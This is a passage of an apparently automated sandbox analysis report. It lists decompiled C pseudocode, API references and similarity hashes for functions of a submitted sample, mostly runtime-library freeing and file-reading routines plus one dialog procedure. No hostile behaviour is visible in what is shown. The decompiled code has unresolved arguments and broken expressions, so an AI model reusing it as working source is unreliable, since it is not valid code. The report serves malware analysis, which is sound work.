					E011963FE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E011976BF( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x11a7850) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E011963FE(_t31);
							E011963FE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E011963FE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E011963FE(_t74);
			}















                                          0x0119752d
                                          0x01197531
                                          0x01197539
                                          0x01197542
                                          0x01197547
                                          0x0119754e
                                          0x01197556
                                          0x0119755e
                                          0x01197569
                                          0x0119756f
                                          0x01197570
                                          0x01197578
                                          0x01197580
                                          0x0119758b
                                          0x01197591
                                          0x01197595
                                          0x011975a0
                                          0x011975a6
                                          0x01197547
                                          0x011975a7
                                          0x011975af
                                          0x011975c2
                                          0x011975d5
                                          0x011975e3
                                          0x011975ee
                                          0x011975f3
                                          0x011975fc
                                          0x01197604
                                          0x01197605
                                          0x0119760b
                                          0x0119760e
                                          0x01197611
                                          0x01197618
                                          0x0119761a
                                          0x0119761e
                                          0x01197626
                                          0x0119762d
                                          0x01197633
                                          0x01197634
                                          0x01197634
                                          0x0119763b
                                          0x0119763d
                                          0x01197642
                                          0x0119764a
                                          0x0119764f
                                          0x01197650
                                          0x01197650
                                          0x01197653
                                          0x01197656
                                          0x01197659
                                          0x0119765c
                                          0x0119765c
                                          0x0119766c

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 01197569
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F19
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F2B
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F3D
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F4F
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F61
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F73
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F85
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F97
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FA9
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FBB
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FCD
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FDF
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FF1
                                          • _free.LIBCMT ref: 0119755E
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01197580
                                          • _free.LIBCMT ref: 01197595
                                          • _free.LIBCMT ref: 011975A0
                                          • _free.LIBCMT ref: 011975C2
                                          • _free.LIBCMT ref: 011975D5
                                          • _free.LIBCMT ref: 011975E3
                                          • _free.LIBCMT ref: 011975EE
                                          • _free.LIBCMT ref: 01197626
                                          • _free.LIBCMT ref: 0119762D
                                          • _free.LIBCMT ref: 0119764A
                                          • _free.LIBCMT ref: 01197662
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: d7fb27c112766d3dfb38cbf7fcb66324d7108dbf9ce210dacb464d1b23c779a2
                                          • Instruction ID: 1a2e1c229360bb3256409c6221dcd84aee511e82a464483776d273f43d7b8b4d
                                          • Opcode Fuzzy Hash: d7fb27c112766d3dfb38cbf7fcb66324d7108dbf9ce210dacb464d1b23c779a2
                                          • Instruction Fuzzy Hash: 5A318D31614306AFFF2DAB3CD944B5AB7E9EF04214F504829E0A9D71A0DF31EA90CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011910D6 Relevance: 15.1, APIs: 10, Instructions: 98windowfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E011910D6(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v532;
				void _v787;
				int _v796;
				intOrPtr _v800;
				struct HWND__* _t10;
				struct HWND__* _t12;
				void* _t14;
				long _t15;
				int _t18;
				int _t19;
				int _t20;
				long _t22;
				struct HWND__* _t24;
				intOrPtr _t26;
				long _t32;
				void* _t33;
				void* _t35;
				DWORD* _t36;

				_t26 = _a8;
				_t10 = _a4;
				if(_t26 == 0x4e) {
					if( *((intOrPtr*)(_a16 + 8)) != 0xfffffda6 ||  *0x11a881c == 0) {
						L14:
						return 0;
					} else {
						_t12 = GetParent(_t10);
						_t32 =  &_v532;
						SendMessageW(_t12, 0x465, 0, _t32);
						_t36 = _t35 - 0x1c;
						_v796 = 0;
						asm("movaps xmm0, [0x11a0120]");
						asm("movups [esp+0x4], xmm0");
						 *_t36 = _t32;
						_v800 = 0x80;
						_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
						if(_t14 == 0xffffffff) {
							goto L14;
						}
						_t33 = _t14;
						_t15 = GetFileSize(_t14, 0);
						if(_t15 == 0xffffffff) {
							CloseHandle(_t33);
							goto L14;
						}
						_t29 =  <  ? _t15 : 0xff;
						_t18 = ReadFile(_t33,  &_v787,  <  ? _t15 : 0xff, _t36, 0);
						_t19 = CloseHandle(_t33);
						if(_t18 == 0) {
							goto L14;
						}
						_t20 = E01191041(_t19,  &_v787,  *_t36);
						if(_t20 == 0xffffffff) {
							goto L14;
						}
						 *0x11a8818 = _t20;
						SendMessageW( *0x11a8cb4, 0x14e, _t20, 0);
						L4:
						goto L14;
					}
				}
				if(_t26 == 0x111) {
					if(_a12 == 0x10191) {
						_t22 = SendMessageW( *0x11a8cb4, 0x147, 0, 0);
						_t23 =  ==  ? 0 : _t22;
						 *0x11a8818 =  ==  ? 0 : _t22;
					}
					goto L14;
				}
				if(_t26 != 0x110) {
					goto L14;
				}
				_t24 = GetDlgItem(_t10, 0x191);
				 *0x11a8cb4 = _t24;
				SendMessageW(_t24, 0x14e,  *0x11a8818, 0);
				goto L4;
			}





















                                          0x011910df
                                          0x011910e6
                                          0x011910f0
                                          0x01191142
                                          0x01191230
                                          0x0119123b
                                          0x01191155
                                          0x01191156
                                          0x0119115c
                                          0x0119116d
                                          0x01191173
                                          0x01191176
                                          0x0119117a
                                          0x01191181
                                          0x01191186
                                          0x01191189
                                          0x01191191
                                          0x0119119a
                                          0x00000000
                                          0x00000000
                                          0x011911a0
                                          0x011911a5
                                          0x011911ae
                                          0x0119123f
                                          0x00000000
                                          0x0119123f
                                          0x011911bb
                                          0x011911ca
                                          0x011911d3
                                          0x011911db
                                          0x00000000
                                          0x00000000
                                          0x011911e1
                                          0x011911e9
                                          0x00000000
                                          0x00000000
                                          0x011911eb
                                          0x01191129
                                          0x01191129
                                          0x00000000
                                          0x01191129
                                          0x01191142
                                          0x011910f8
                                          0x0119120e
                                          0x0119121f
                                          0x01191228
                                          0x0119122b
                                          0x0119122b
                                          0x00000000
                                          0x0119120e
                                          0x01191104
                                          0x00000000
                                          0x00000000
                                          0x01191110
                                          0x01191116
                                          0x01191129
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32 ref: 01191110
                                          • SendMessageW.USER32(0000014E,00000000,00000000), ref: 01191129
                                          • GetParent.USER32(?), ref: 01191156
                                          • SendMessageW.USER32(00000000,00000465,00000000,?), ref: 0119116D
                                          • CreateFileW.KERNEL32 ref: 01191191
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 011911A5
                                          • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000), ref: 011911CA
                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 011911D3
                                          • SendMessageW.USER32(00000147,00000000,00000000), ref: 0119121F
                                          • CloseHandle.KERNEL32(00000000), ref: 0119123F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileMessageSend$CloseHandle$CreateItemParentReadSize
                                          • String ID:
                                          • API String ID: 2025491334-0
                                          • Opcode ID: db685b2d06e4334941cdb89d9dad91e3c6259e672471eb1ab47525b98f44c697
                                          • Instruction ID: 19c0867fd910fa77f0f3a4a18415d009c52038dfd450d5484e0e937da95f8577
                                          • Opcode Fuzzy Hash: db685b2d06e4334941cdb89d9dad91e3c6259e672471eb1ab47525b98f44c697
                                          • Instruction Fuzzy Hash: 4B3103B0205301BBEB3D5B789C4CBAE7EAAEB84721F600629F175C51D4CB7048C28BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011957E0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E011957E0(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x11a0280;
				if(_t68 != 0x11a0280) {
					E011963FE(_t68);
					_t36 = _a4;
				}
				E011963FE( *((intOrPtr*)(_t36 + 0x3c)));
				E011963FE( *((intOrPtr*)(_a4 + 0x30)));
				E011963FE( *((intOrPtr*)(_a4 + 0x34)));
				E011963FE( *((intOrPtr*)(_a4 + 0x38)));
				E011963FE( *((intOrPtr*)(_a4 + 0x28)));
				E011963FE( *((intOrPtr*)(_a4 + 0x2c)));
				E011963FE( *((intOrPtr*)(_a4 + 0x40)));
				E011963FE( *((intOrPtr*)(_a4 + 0x44)));
				E011963FE( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E01195959(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E011959C4(_t67, _t72, _t73, _t77);
			}














                                          0x011957e0
                                          0x011957e0
                                          0x011957e0
                                          0x011957e5
                                          0x011957eb
                                          0x011957ed
                                          0x011957f3
                                          0x011957f6
                                          0x011957fb
                                          0x011957fe
                                          0x01195802
                                          0x0119580d
                                          0x01195818
                                          0x01195823
                                          0x0119582e
                                          0x01195839
                                          0x01195844
                                          0x0119584f
                                          0x0119585d
                                          0x01195868
                                          0x01195870
                                          0x01195871
                                          0x01195874
                                          0x0119587a
                                          0x0119587e
                                          0x01195882
                                          0x01195883
                                          0x0119588d
                                          0x01195893
                                          0x01195894
                                          0x01195897
                                          0x0119589d
                                          0x011958a1
                                          0x011958a5
                                          0x011958ac

                                          APIs
                                          • _free.LIBCMT ref: 011957F6
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01195802
                                          • _free.LIBCMT ref: 0119580D
                                          • _free.LIBCMT ref: 01195818
                                          • _free.LIBCMT ref: 01195823
                                          • _free.LIBCMT ref: 0119582E
                                          • _free.LIBCMT ref: 01195839
                                          • _free.LIBCMT ref: 01195844
                                          • _free.LIBCMT ref: 0119584F
                                          • _free.LIBCMT ref: 0119585D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 970f03ba3dcb809fadc95a144c04841f1d3ac56ee95f0f53b1daa6e91bc0978f
                                          • Instruction ID: 7f7174a3baefb788e39cc5bcb7477c63e6a9fcbd3938a0ee265fde9806b4b94d
                                          • Opcode Fuzzy Hash: 970f03ba3dcb809fadc95a144c04841f1d3ac56ee95f0f53b1daa6e91bc0978f
                                          • Instruction Fuzzy Hash: 2D21A576904109BFDF55EF98C880DDE7BB9EF18244F4041A6A6299B120EB31EB54CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01199629 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01199629(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E01196E52(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E01196E3F( *_t137))) = 9;
						L60:
						_t139 = E011964D1();
						goto L61;
					}
					__eflags = _t198 -  *0x11a9658;
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x11a9458 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E01196E52(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
								E011964D1();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E01197200(_t154);
								E011963FE(0);
								E011963FE(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0119A08D(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0119B552(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E01196E65(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E01196E3F(__eflags))) = 9;
											 *(E01196E52(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E01199D0C();
												} else {
													_t170 = E011999D9();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E01199A54(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E01196E3F(__eflags))) = 0xc;
									 *(E01196E52(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E011963FE(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E01196E52(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E01196E52(_t246)) =  *_t197 & 0x00000000;
					_t139 = E01196E3F(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                          0x01199632
                                          0x01199636
                                          0x01199639
                                          0x01199653
                                          0x01199655
                                          0x011999ba
                                          0x011999ba
                                          0x011999bf
                                          0x011999bf
                                          0x011999c7
                                          0x011999cd
                                          0x011999cd
                                          0x00000000
                                          0x011999cd
                                          0x0119965b
                                          0x01199661
                                          0x00000000
                                          0x00000000
                                          0x0119966b
                                          0x01199671
                                          0x01199674
                                          0x01199677
                                          0x01199681
                                          0x01199684
                                          0x01199687
                                          0x0119968b
                                          0x0119968d
                                          0x00000000
                                          0x00000000
                                          0x01199693
                                          0x01199696
                                          0x0119969c
                                          0x011996b6
                                          0x011996b8
                                          0x011999b6
                                          0x00000000
                                          0x011999b6
                                          0x011996be
                                          0x011996c1
                                          0x00000000
                                          0x00000000
                                          0x011996c7
                                          0x011996cb
                                          0x00000000
                                          0x00000000
                                          0x011996d1
                                          0x011996d4
                                          0x011996d8
                                          0x011996df
                                          0x011996e1
                                          0x011996e1
                                          0x011996e4
                                          0x01199739
                                          0x0119973b
                                          0x01199701
                                          0x01199706
                                          0x0119970d
                                          0x01199713
                                          0x00000000
                                          0x0119973d
                                          0x0119973f
                                          0x01199740
                                          0x01199742
                                          0x01199745
                                          0x01199747
                                          0x01199749
                                          0x0119974b
                                          0x0119974b
                                          0x01199756
                                          0x01199758
                                          0x0119975f
                                          0x01199764
                                          0x01199767
                                          0x0119976a
                                          0x0119976c
                                          0x01199790
                                          0x01199798
                                          0x0119979b
                                          0x011997a2
                                          0x011997a9
                                          0x011997ad
                                          0x011997af
                                          0x011997b2
                                          0x011997b9
                                          0x011997b9
                                          0x011997bc
                                          0x011997be
                                          0x011997c1
                                          0x011997c6
                                          0x011997c9
                                          0x011997d2
                                          0x011997d2
                                          0x011997d6
                                          0x011997d9
                                          0x011997db
                                          0x011997e1
                                          0x011997e3
                                          0x011997ec
                                          0x011997ed
                                          0x011997ef
                                          0x011997f3
                                          0x011997f4
                                          0x011997f8
                                          0x011997fb
                                          0x01199805
                                          0x0119980a
                                          0x0119980d
                                          0x0119981c
                                          0x0119981c
                                          0x01199820
                                          0x01199823
                                          0x01199825
                                          0x01199827
                                          0x01199829
                                          0x0119982e
                                          0x01199830
                                          0x01199834
                                          0x01199835
                                          0x0119983b
                                          0x01199845
                                          0x01199846
                                          0x01199849
                                          0x0119984e
                                          0x01199851
                                          0x01199860
                                          0x01199860
                                          0x01199864
                                          0x01199867
                                          0x01199869
                                          0x0119986b
                                          0x0119986d
                                          0x0119986f
                                          0x01199875
                                          0x01199875
                                          0x01199876
                                          0x01199885
                                          0x01199888
                                          0x01199889
                                          0x01199889
                                          0x0119986d
                                          0x01199869
                                          0x01199851
                                          0x01199829
                                          0x01199825
                                          0x0119980d
                                          0x011997e3
                                          0x011997db
                                          0x0119988f
                                          0x01199895
                                          0x01199897
                                          0x0119990a
                                          0x0119990a
                                          0x0119990e
                                          0x0119991e
                                          0x01199924
                                          0x01199926
                                          0x01199982
                                          0x01199982
                                          0x0119998a
                                          0x0119998b
                                          0x0119998d
                                          0x011999a6
                                          0x011999a9
                                          0x011998e6
                                          0x011998e7
                                          0x00000000
                                          0x011998ec
                                          0x011999af
                                          0x00000000
                                          0x011999af
                                          0x01199994
                                          0x0119999f
                                          0x00000000
                                          0x0119999f
                                          0x01199928
                                          0x0119992b
                                          0x0119992e
                                          0x00000000
                                          0x00000000
                                          0x01199930
                                          0x01199930
                                          0x01199933
                                          0x01199936
                                          0x01199939
                                          0x01199940
                                          0x01199945
                                          0x01199947
                                          0x0119994b
                                          0x01199966
                                          0x0119996a
                                          0x0119996b
                                          0x0119996e
                                          0x0119996f
                                          0x0119997b
                                          0x01199971
                                          0x01199971
                                          0x01199971
                                          0x0119994d
                                          0x0119994d
                                          0x0119994d
                                          0x01199958
                                          0x0119995d
                                          0x01199960
                                          0x01199960
                                          0x00000000
                                          0x01199945
                                          0x0119989c
                                          0x0119989f
                                          0x011998a6
                                          0x011998ab
                                          0x00000000
                                          0x00000000
                                          0x011998b4
                                          0x011998ba
                                          0x011998bc
                                          0x00000000
                                          0x00000000
                                          0x011998be
                                          0x011998c2
                                          0x00000000
                                          0x00000000
                                          0x011998d6
                                          0x011998dc
                                          0x011998de
                                          0x01199902
                                          0x01199905
                                          0x00000000
                                          0x01199905
                                          0x011998e0
                                          0x00000000
                                          0x0119976e
                                          0x01199773
                                          0x0119977e
                                          0x011998ed
                                          0x011998ed
                                          0x011998ed
                                          0x011998f0
                                          0x011998f1
                                          0x00000000
                                          0x011998f9
                                          0x0119976c
                                          0x0119973b
                                          0x011996e6
                                          0x011996e9
                                          0x011996fd
                                          0x011996ff
                                          0x01199720
                                          0x01199723
                                          0x01199726
                                          0x01199729
                                          0x00000000
                                          0x01199729
                                          0x00000000
                                          0x011996eb
                                          0x011996eb
                                          0x011996ee
                                          0x011996f1
                                          0x00000000
                                          0x011996f1
                                          0x011996e9
                                          0x0119969e
                                          0x011996a3
                                          0x011996ab
                                          0x00000000
                                          0x0119963b
                                          0x01199640
                                          0x01199643
                                          0x01199648
                                          0x011999d2
                                          0x00000000
                                          0x011999d2

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 254ae8515312547020a2456bd3c30945a22c405a102fa4ab0130332a5e7667f5
                                          • Instruction ID: 31caa9989e3ad818e70dfd1e2e2943bf573e4f5ac0ef3d1bd5665acc5a62941f
                                          • Opcode Fuzzy Hash: 254ae8515312547020a2456bd3c30945a22c405a102fa4ab0130332a5e7667f5
